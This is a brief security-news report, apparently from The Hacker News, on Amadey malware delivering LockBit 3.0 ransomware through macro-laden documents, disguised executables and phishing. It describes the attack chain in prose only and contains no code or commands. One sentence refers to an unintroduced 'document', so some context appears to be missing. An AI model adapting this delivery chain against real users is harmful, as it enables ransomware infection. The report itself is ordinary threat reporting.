Amadey Bot Spotted Deploying LockBit 3.0 Ransomware on Hacked Machines

2022-11-08 14:52

The Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems, researchers have warned.

The document contains a malicious VBA macro that, when enabled by the victim, runs a PowerShell command to download and run Amadey.

In an alternative attack chain, Amadey is disguised as a seemingly harmless file bearing a Word icon but is actually an executable that's propagated via a phishing message.

Succeeding in the execution of Amadey, the malware fetches and launches additional commands from a remote server, which includes the LockBit ransomware either in PowerShell or binary formats.

LockBit 3.0, also known as LockBit Black, launched in June 2022, alongside a new dark web portal and the very first bug bounty program for a ransomware operation, promising rewards of up to $1 million for finding bugs in its website and software.

"As LockBit ransomware is being distributed through various methods, user caution is advised," the researchers concluded.

News URL

https://thehackernews.com/2022/11/amadey-bot-spotted-deploying-lockbit-30.html

#BOT #hacked #lockbit #ransomware

News URL

Related news